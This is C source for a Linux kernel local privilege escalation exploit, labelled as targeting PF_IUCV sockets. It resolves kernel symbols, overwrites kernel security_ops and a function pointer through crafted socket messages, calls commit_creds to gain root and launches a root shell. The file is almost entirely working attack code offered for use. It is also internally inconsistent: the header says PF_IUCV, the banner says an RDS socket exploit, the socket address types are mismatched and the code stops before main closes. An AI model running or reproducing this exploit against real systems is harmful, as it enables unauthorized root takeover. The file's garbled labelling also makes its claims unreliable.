/* * Linux Kernel <= 2.6.36 PF_IUCV privilege escalation exploit * thanks to B

1. /*
2.  * Linux Kernel <= 2.6.36 PF_IUCV privilege escalation exploit
3. * thanks to BCM/ROSe and other bs socket exploits :) -xd
4. * Greetz: #Haqnet @ efnet , paralox.org and many other frinds who help make my world fun!
5. * note: very quick hackup to show simple socket-sploiting but, this can work on 2.4 and 2.6 earlier... ref: sendpage3&&the_rebels ;)
6. */
7. #include <stdio.h>
8. #include <unistd.h>
9. #include <stdlib.h>
10. #include <fcntl.h>
11. #include <sys/types.h>
12. #include <sys/socket.h>
13. #include <netinet/in.h>
14. #include <errno.h>
15. #include <string.h>
16. #include <sys/ptrace.h>
17. #include <sys/utsname.h>
18.  
19. #define RECVPORT 12000
20. #define SENDPORT 12001
21.  
22. /* define sycalls for the lame boxes */
23. #define PF_IUCV AF_IUCV
24. #define AF_IUCV 32
25.  
26. int prep_sock(int port) {
27. int s, ret;
28. struct sockaddr_in addr;
29. s = socket(PF_IUCV, SOCK_SEQPACKET, 0);
30. if(s < 0) {
31. printf("[*] Could not open socket.\n");
32. exit(-1);
33. }
34. memset(&addr, 0, sizeof(addr));
35. addr.sin_addr.s_addr = inet_addr("localhost");
36. addr.sin_family = AF_IUCV;  //AF_INET
37. addr.sin_port = htons(port);
38. ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
39. if(ret < 0) {
40. printf("[*] Could not bind socket.\n");
41. exit(-1);
42. }
43. return s;
44. }
45.  
46. void get_message(unsigned long address, int sock) {
47. recvfrom(sock, (void *)address, sizeof(void *), 0,NULL, NULL);
48. }
49.  
50. void send_message(unsigned long value, int sock) {
51. int size, ret;
52. struct sockaddr_in recvaddr;
53. struct msghdr msg;
54. struct iovec iov;
55. unsigned long buf;
56. memset(&recvaddr, 0, sizeof(recvaddr));
57. size = sizeof(recvaddr);
58. recvaddr.sin_port = htons(RECVPORT);
59. recvaddr.sin_family = AF_IUCV;
60. recvaddr.sin_addr.s_addr = inet_addr("localhost");
61. memset(&msg, 0, sizeof(msg));
62. msg.msg_name = &recvaddr;
63. msg.msg_namelen = sizeof(recvaddr);
64. msg.msg_iovlen = 1;
65. buf = value;
66. iov.iov_len = sizeof(buf);
67. iov.iov_base = &buf;
68. msg.msg_iov = &iov;
69. ret = sendmsg(sock, &msg, 0);
70. if(ret < 0) {
71. printf("[*] Something went wrong sending.\n");
72. exit(-1);
73. }
74. }
75.  
76. void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) {
77. if(!fork()) {
78. sleep(1);
79. send_message(value, sendsock);
80. exit(1);
81. } else {
82. get_message(addr, recvsock);
83. wait(NULL);
84. }
85. }
86.  
87. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
88. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
89. _commit_creds commit_creds;
90. _prepare_kernel_cred prepare_kernel_cred;
91.  
92. int __attribute__((regparm(3)))
93. getroot(void * file, void * vma) {
94. commit_creds(prepare_kernel_cred(0));
95. return -1;
96. }
97.  
98. unsigned long get_kernel_sym(char *name) {
99. FILE *f;
100. unsigned long addr;
101. char dummy;
102. char sname[512];
103. struct utsname ver;
104. int ret;
105. int rep = 0;
106. int oldstyle = 0;
107. f = fopen("/proc/kallsyms", "r");
108. if (f == NULL) {
109. f = fopen("/proc/ksyms", "r");
110. if (f == NULL)
111. goto fallback;
112. oldstyle = 1;
113. }
114. repeat:
115. ret = 0;
116. while(ret != EOF) {
117. if (!oldstyle)
118. ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
119. else {
120. ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
121. if (ret == 2) {
122. char *p;
123. if (strstr(sname, "_O/") || strstr(sname, "_S."))
124. continue;
125. p = strrchr(sname, '_');
126. if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
127. p = p - 4;
128. while (p > (char *)sname && *(p - 1) == '_')
129. p--;
130. *p = '\0';
131. }
132. }
133. }
134. if (ret == 0) {
135. fscanf(f, "%s\n", sname);
136. continue;
137. }
138. if (!strcmp(name, sname)) {
139. fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
140. fclose(f);
141. return addr;
142. }
143. }
144. fclose(f);
145. if (rep)
146. return 0;
147. fallback:
148. uname(&ver);
149. if (strncmp(ver.release, "2.6", 3))
150. oldstyle = 1;
151. sprintf(sname, "/boot/System.map-%s", ver.release);
152. f = fopen(sname, "r");
153. if (f == NULL)
154. return 0;
155. rep = 1;
156. goto repeat;
157. }
158.  
159. int main(int argc, char * argv[]) {
160. unsigned long sec_ops, def_ops, cap_ptrace, target;
161. int sendsock, recvsock;
162. struct utsname ver;
163. printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
164. uname(&ver);
165. if(strncmp(ver.release, "2.6.3", 5)) {
166. printf("[*] Your kernel is not vulnerable.\n");
167. return -1;
168. }
169. printf("[*] Resolving kernel addresses..\n");
170. sec_ops = get_kernel_sym("security_ops");
171. def_ops = get_kernel_sym("default_security_ops");
172. cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
173. commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
174. prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
175. if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
176. printf("[*] Failed to resolve kernel symbols.\n");
177. return -1;
178. }
179. target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));
180. sendsock = prep_sock(SENDPORT);
181. recvsock = prep_sock(RECVPORT);
182. printf("[*] Overwriting security ops...\n");
183. write_to_mem(sec_ops, def_ops, sendsock, recvsock);
184. printf("[*] Overwriting function pointer...\n");
185. write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);
186. printf("[*] Triggering payload...\n");
187. ptrace(PTRACE_TRACEME, 1, NULL, NULL);
188. printf("[*] Restoring function pointer...\n");
189. write_to_mem(target, cap_ptrace, sendsock, recvsock);
190. if(getuid()) {
191. printf("[*] Exploit failed to get root.\n");
192. return -1;
193. }
194. if(getuid() == 0) {
195. printf("[*] Got root!\n");
196. execve("/bin/bash","/bin/bash", NULL);
197. }